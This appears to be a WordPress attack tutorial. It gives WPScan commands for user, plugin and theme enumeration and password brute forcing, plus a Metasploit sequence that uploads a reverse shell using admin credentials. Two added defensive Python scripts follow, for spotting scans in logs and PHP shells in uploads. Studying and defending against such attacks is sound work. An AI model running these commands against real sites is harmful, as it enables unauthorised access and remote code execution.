Attacking Wordpress
WPSScan: How to Attack WordPress Website

Learn how to execute the most common WordPress attacks, from username enumeration to uploading a reverse shell onto the target box.

Install WPscan

apt install wpscan -y

WPscan Parameters

wpscan -h

Update WPscan

wpscan --update

Enumerate WordPress using WPscan

All Themes Installed

wpscan --url <target-url> -e t

Vulnerable Themes Installed

wpscan --url <target-url> -e vt

All Plugins Installed

wpscan --url <target-url> -e p

Vulnerable Plugins Installed

wpscan --url <target-url> -e vp

WordPress Users

wpscan --url <target-url> -e u

Brute Force WordPress Passwords

wpscan --url <target-url> --passwords <path-to-wordlist>
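The enumeration and brute-force steps above leave a recognisable trail in the web server's access log: ?author=N redirects, hits on the REST users endpoint, a scanner User-Agent, and a burst of POSTs to wp-login.php or xmlrpc.php from one address. The script below is an added defender-side example, not part of the original page or of WPScan itself; it assumes the Apache/nginx "combined" log layout and uses constructed sample lines, and the login threshold of 5 is an arbitrary choice to tune per site.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Regex for the common Apache/nginx "combined" access log layout. This layout is an
# assumption of the example; adjust the pattern for your own log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (not captured traffic): one address walks ?author=N,
# probes the REST users endpoint and then hammers the login endpoints; a second
# address is ordinary browsing.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /about/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_user_enumeration(path):
    """True for the two classic username-discovery requests: ?author=N and the
    REST users listing."""
    parsed = urlparse(path)
    if "author" in parse_qs(parsed.query):
        return True
    return parsed.path.rstrip("/").endswith("/wp-json/wp/v2/users")


def is_login_attempt(method, path):
    """True for form logins and XML-RPC calls, the two endpoints a password
    brute force drives."""
    return method == "POST" and urlparse(path).path in ("/wp-login.php", "/xmlrpc.php")


def analyze(log_text, login_threshold=5):
    """Summarise per-IP enumeration hits, scanner User-Agents and login bursts."""
    enum_hits = Counter()
    scanner_ips = set()
    login_posts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if "wpscan" in rec["ua"].lower():
            scanner_ips.add(rec["ip"])
        if is_user_enumeration(rec["path"]):
            enum_hits[rec["ip"]] += 1
        if is_login_attempt(rec["method"], rec["path"]):
            login_posts[rec["ip"]] += 1
    return {
        "user_enumeration": dict(enum_hits),
        "scanner_user_agent": sorted(scanner_ips),
        "login_bruteforce": {ip: n for ip, n in login_posts.items() if n >= login_threshold},
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The User-Agent check is the weakest signal, since a scanner can set any string it likes; the author-ID walk and the POST burst to the login endpoints survive that and are what a rate limit or a lockout rule should key on.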

Help with Metasploit

Upload Reverse Shell to WordPress

Upload Manually
Upload using Metasploit

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
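Whether the shell arrives by hand or through the module above, it ends up on disk under wp-content as either a PHP file where only static media belongs or a plugin directory nobody installed. The script below is an added example for the defending side, not part of the page or of Metasploit: it flags PHP under the uploads tree (by extension, or by a PHP open tag hidden in a file posing as an image) and any plugin directory missing from an expected list. The wp-content layout it builds is constructed for the demonstration, and the extension and marker lists are assumptions to extend for your own install.

```python
import tempfile
from pathlib import Path

# File types PHP will execute, plus markers that betray PHP code hidden in a file
# that claims to be an image. Both lists are assumptions of this example.
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php5", ".php7", ".phar"}
PHP_MARKERS = (b"<?php", b"<?=")


def scan_uploads(uploads_dir):
    """Return (relative_path, reason) for every file under uploads_dir that
    either has an executable PHP extension or carries a PHP open tag in its
    first 4 KiB. The media library should only ever hold static assets."""
    root = Path(uploads_dir)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in PHP_EXTENSIONS:
            findings.append((rel, "php-extension"))
            continue
        with path.open("rb") as fh:
            head = fh.read(4096)
        if any(marker in head for marker in PHP_MARKERS):
            findings.append((rel, "php-code-in-non-php-file"))
    return findings


def scan_plugins(plugins_dir, expected):
    """Return plugin directories that are not on the expected list, so that a
    plugin dropped through an authenticated upload stands out."""
    root = Path(plugins_dir)
    return sorted(p.name for p in root.iterdir() if p.is_dir() and p.name not in expected)


def build_sample_site():
    """Constructed wp-content tree for the demonstration (not a real site)."""
    base = Path(tempfile.mkdtemp(prefix="wp-content-"))
    month = base / "uploads" / "2023" / "10"
    month.mkdir(parents=True)
    (month / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed JPEG bytes")
    (month / "shell.php").write_bytes(b"<?php /* constructed placeholder, no payload */ ?>")
    (month / "avatar.png").write_bytes(b"\x89PNG\r\n\x1a\n <?php /* constructed */ ?>")
    for name in ("akismet", "unknown-plugin-a1b2"):
        (base / "plugins" / name).mkdir(parents=True)
    return str(base)


if __name__ == "__main__":
    site = build_sample_site()
    print(scan_uploads(f"{site}/uploads"))
    print(scan_plugins(f"{site}/plugins", expected={"akismet"}))
```

Run it from cron against the live wp-content directory and alert on any non-empty result; pairing it with a web server rule that refuses to execute PHP under uploads removes the payoff even when the scan is late.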